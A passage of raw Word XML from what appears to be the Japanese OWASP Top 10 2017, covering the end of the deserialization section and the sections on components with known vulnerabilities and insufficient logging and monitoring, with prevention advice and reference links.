        </w:rPr>
        <w:t xml:space="preserve">シナリオ #2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: あるPHPフォーラムでは、PHPオブジェクトのシリアライゼーションを使用して、ユーザのユーザID、ロール、パスワードハッシュやその他の状態を含むSuper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bookmarkEnd w:id="224"/>
    <w:bookmarkStart w:id="234" w:name="参考資料-8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">参考資料</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="229" w:name="owasp-8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1045"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId225">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Cheat Sheet: Deserialization</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1045"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId226">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Proactive Controls: Validate All Inputs</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1045"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId111">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Application Security Verification Standard: TBA</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1045"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId227">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP AppSecEU 2016: Surviving the Java Deserialization Apocalypse</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1045"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId228">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP AppSecUSA 2017: Friday the 13th JSON Attacks</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="229"/>
    <w:bookmarkStart w:id="233" w:name="外部資料-7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">外部資料</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1046"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId230">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-502: Deserialization of Untrusted Data</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1046"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId231">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Java Unmarshaller Security</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1046"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId232">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP AppSec Cali 2015: Marshalling Pickles</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="233"/>
    <w:bookmarkEnd w:id="234"/>
    <w:bookmarkEnd w:id="235"/>
    <w:bookmarkStart w:id="255" w:name="a92017-既知の脆弱性のあるコンポーネントの使用"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A9:2017-既知の脆弱性のあるコンポーネントの使用</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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">蔓延度 3 : 検出のしやすさ 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">技術面への影響 2 : ビジネス面への影響</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">多くの既知の脆弱性に対し、公開されている攻撃方法を見つけることは簡単ですが、それ以外の脆弱性は攻撃方法を新たに開発する労力を要します。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>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は、脆弱性を見つけるのに役立ちますが、悪用のしやすさを判断するには更なる労力が必要になります。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">いくつかの既知の脆弱性は、軽微な影響に留まりますが、これまでの最大級のセキュリティ侵害は、コンポーネントの既知の脆弱性を悪用したものでした。保護する資産によっては、おそらくこのリスクはもっとも注意すべきリスクであるはずです。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkStart w:id="236" w:name="脆弱性発見のポイント-8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">脆弱性発見のポイント</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">以下に該当する場合、脆弱と言えます:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1047"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">使用しているすべてのコンポーネントのバージョンを知らない場合（クライアントサイド・サーバサイドの両方について）。これには直接使用するコンポーネントだけでなく、ネストされた依存関係も含む。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1047"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ソフトウェアが脆弱な場合やサポートがない場合、また使用期限が切れている場合。これには、OSやWebサーバ、アプリケーションサーバ、データベース管理システム（DBMS）、アプリケーション、API、すべてのコンポーネント、ランタイム環境とライブラリを含む場合。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1047"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">脆弱性スキャンを定期的にしていない場合や、使用しているコンポーネントに関するセキュリティ情報を購読していない場合。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1047"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>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組織は、解決済みの脆弱性について、何日も、場合によっては何ヶ月も不必要な危険にさらされることになる。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1047"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ソフトウェア開発者が、更新やアップグレードまたはパッチの互換性をテストしない場合。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1047"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">コンポーネントの設定をセキュアにしていない場合。（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A6:2017-不適切なセキュリティ設定</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">参照）</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="236"/>
    <w:bookmarkStart w:id="237" w:name="防止方法-8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">防止方法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">以下に示すパッチ管理プロセスが必要です：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1048"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">未使用の依存関係、不要な機能、コンポーネント、ファイルや文書を取り除く。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1048"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1048"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">コンポーネントの脆弱性についてCVEや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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1048"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1048"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>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bookmarkEnd w:id="237"/>
    <w:bookmarkStart w:id="242" w:name="攻撃シナリオの例-8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">攻撃シナリオの例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>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t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">発見済みの悪用可能なコンポーネントの脆弱性の例：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1049"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apache Struts 2においてリモートで任意のコードが実行される脆弱性</w:t>
      </w:r>
      <w:hyperlink r:id="rId238">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CVE-2017-5638</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">は、重大な侵害をもたらしています。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1049"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId239">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攻撃者を助けるようなツールがあり、パッチが未適用なシステムやシステムの設定ミスを自動的に見つけることができます。例えば、</w:t>
      </w:r>
      <w:hyperlink r:id="rId240">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Shodan IoT search engine</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">は、2014年4月にパッチが適用された</w:t>
      </w:r>
      <w:hyperlink r:id="rId241">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Heartbleed</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">の脆弱性などセキュリティに問題のある機器を見つけることができます。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="242"/>
    <w:bookmarkStart w:id="254" w:name="参考資料-9"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">参考資料</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="247" w:name="owasp-9"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1050"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId243">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Application Security Verification Standard: V1 Architecture, design and threat modelling</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1050"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId244">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Dependency Check (for Java and .NET libraries)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1050"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId245">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Testing Guide - Map Application Architecture (OTG-INFO-010)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1050"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId246">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Virtual Patching Best Practices</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="247"/>
    <w:bookmarkStart w:id="253" w:name="外部資料-8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">外部資料</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1051"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId248">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">The Unfortunate Reality of Insecure Libraries</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1051"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId249">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">MITRE Common Vulnerabilities and Exposures (CVE) search</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1051"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId250">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">National Vulnerability Database (NVD)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1051"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId251">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Retire.js for detecting known vulnerable JavaScript libraries</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1051"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId252">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Ruby Libraries Security Advisory Database and Tools</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="253"/>
    <w:bookmarkEnd w:id="254"/>
    <w:bookmarkEnd w:id="255"/>
    <w:bookmarkStart w:id="270" w:name="a102017-不十分なロギングとモニタリング"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A10:2017-不十分なロギングとモニタリング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脅威エージェント/攻撃手法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">セキュリティ上の弱点</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">影響</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">アクセスレベル : 悪用のしやすさ 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">蔓延度 3 : 検出のしやすさ 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">技術面への影響 2 : ビジネス面への影響</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>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tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="rId221">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tcPr/>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平均191日という多くの時間がかかりました。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkStart w:id="257" w:name="脆弱性発見のポイント-9"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">脆弱性発見のポイント</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ロギングや検知、モニタリング、適時の対応が十分に行われないという状況は、いつでも発生します:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1052"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ログイン、失敗したログイン、重要なトランザクションなどの監査可能なイベントがログに記録されていない。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1052"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">警告とエラーが発生してもログメッセージが生成されない、または不十分、不明確なメッセージが生成されている。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1052"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">アプリケーションとAPIのログが、疑わしいアクティビティをモニタリングしていない。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1052"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ログがローカルにのみ格納されている。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1052"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">アラートの適切なしきい値とレスポンスのエスカレーションプロセスが整えられていない、または有効ではない。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1052"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ペネトレーションテストや</w:t>
      </w:r>
      <w:hyperlink r:id="rId80">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">DAST</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">ツール（</w:t>
      </w:r>
      <w:hyperlink r:id="rId256">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP ZAP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">など）によるスキャンがアラートをあげない。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1052"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A3:2017-機微な情報の露出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">を参照）。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="257"/>
    <w:bookmarkStart w:id="261" w:name="防止方法-9"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">防止方法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">アプリケーションによって保存または処理されるデータのリスクに応じて対応する：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1053"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ログイン、アクセス制御の失敗、サーバ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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1053"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">統合ログ管理ソリューションで簡単に使用できる形式でログが生成されていることを確認する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1053"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1053"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">疑わしい活動がタイムリーに検知されて対応されるように、効果的なモニタリングとアラートを確立する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1053"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId258">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59">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP AppSensor</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:hyperlink r:id="rId260">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bookmarkEnd w:id="261"/>
    <w:bookmarkStart w:id="262" w:name="攻撃シナリオの例-9"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">攻撃シナリオの例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>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Cs/>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Cs/>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bookmarkEnd w:id="262"/>
    <w:bookmarkStart w:id="269" w:name="参考資料-10"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">参考資料</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="265" w:name="owasp-10"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1054"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId263">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Proactive Controls: Implement Logging and Intrusion Detection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1054"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId111">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Application Security Verification Standard: V8 Logging and Monitoring</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1054"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId111">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Testing Guide: Testing for Detailed Error Code</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1054"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId264">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Cheat Sheet: Logging</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="265"/>
    <w:bookmarkStart w:id="268" w:name="外部資料-9"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">外部資料</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1055"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId266">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-223: Omission of Security-relevant Information</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
